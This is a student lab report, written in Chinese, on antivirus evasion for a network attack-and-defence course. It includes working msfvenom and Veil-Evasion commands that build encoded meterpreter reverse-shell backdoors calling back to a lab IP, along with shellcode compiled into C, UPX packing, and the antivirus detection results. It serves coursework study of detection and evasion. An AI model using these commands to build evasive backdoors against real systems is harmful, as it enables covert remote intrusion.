20155330 《網絡攻防》 Exp3 免殺原理與實踐

20155330 《網絡攻防》 Exp3 免殺原理與實踐

基礎問題回答

1. 殺軟是如何檢測出惡意代碼的？
   1. 基於特徵碼。先對流行代碼特徵的提取，而後進行程序的比對，若是也檢測到相應的特徵碼的程序即爲檢測出惡意代碼。
   2. 基於行爲。殺軟經過檢測程序是否有更改註冊表行爲、是否有設置自啓動、是否有修改權限等等行爲進行判斷。

2. 免殺是作什麼？

   惡意代碼避免殺毒軟件查殺，從而實現入侵。

3. 免殺的基本方法有哪些？

   • 對惡意代碼進行加殼
   • 利用shellcode進行編碼

實踐過程記錄

使用msf生成後門程序的檢測

• 將實驗二中生成的後門程序上傳到virscan中進行掃描，掃描信息及結果以下：
  

  
  

• 根據掃描結果，有48%的殺軟檢測出了病毒。

  使用msf編碼器生成meterpreter可執行文件

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.204.128 LPORT=5330 -f exe > 5330exp3.exe生成一次編碼過的可執行文件
  
• 再次對生成的程序進行掃描，掃描信息及結果以下：
  
  
  
• 相較於直接生成後門程序，進行過編碼後的程序依然有48%的殺軟檢測出病毒。
• 將文件進行十次編碼
  

• 掃描文件，仍是被那麼多的殺軟查殺到，那麼屢次編碼好像也沒有太大的做用。
  
  
  

  Veil-Evasion免殺平臺

• 在終端中使用veil-evasion命令打開該軟件。
  
• 輸入

use python/meterpreter/rev_tcp  //設置payload
set LHOST 192.168.204.138    //設置反彈鏈接win-IP
set port 443    //設置反彈端口443，默認爲4444
generate    //生成
5330    //程序名
1

• 從路徑/var/lib/veil-evasion/output/compiled找到相應程序，放到網站上掃描，結果以下：
  
  
  

  C語言調用Shellcode

• 在kali主機下打開終端，執行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Kali-IP LPORT=443 -f c，生成一個C語言數組。
  
  
• 建立一個C文件（可用touch命令生成）：MSSC_5330.c（免殺shellcode），將上面生成的數組copy到該文件下，並加入一個主函數。
  
  
• 使用i686-w64-mingw32-g++ MSSC_5330.c -o MSSC_5330.exe命令將該C語言代碼轉換爲一個可在64位windows系統下操做的可執行文件MSSC_5330.exe。
  
• 放到網站上掃描一下，發現能夠檢測到病毒的殺軟更少了。
  
  

• 經過nc命令將可執行文件傳到win7主機上，很快就被查殺了QAQ。
  

  加殼

• 經過命令upx #須要加殼的文件名 -o #加殼後的文件名，生成程序。
  
• 放到網站上掃描一下，emmmmm...沒什麼變化……
  
  
• 再傳到win7主機上，掃描一下。
  
• 好像能夠了？看看掃描日誌。
  

• 過了一會，又被查殺了TUT。
  

  離實戰還缺些什麼技術或步驟？

  應該是對編寫免殺代碼還不太瞭解，以目前的能力還只能依靠軟件來生成代碼，若是是純手工的代碼可能免殺的概率會更大一些。

  實踐總結與體會

  經過不一樣的方式對惡意代碼生成病毒程序有了必定的瞭解，能夠簡單製做出一些免殺後門。從而也瞭解到了目前咱們所信賴的殺軟其實仍是存在着一些漏洞，假設將shellcode進行從新組合再加殼的話，免殺率應該還會再上升，從而經過殺軟的掃描，入侵靶機。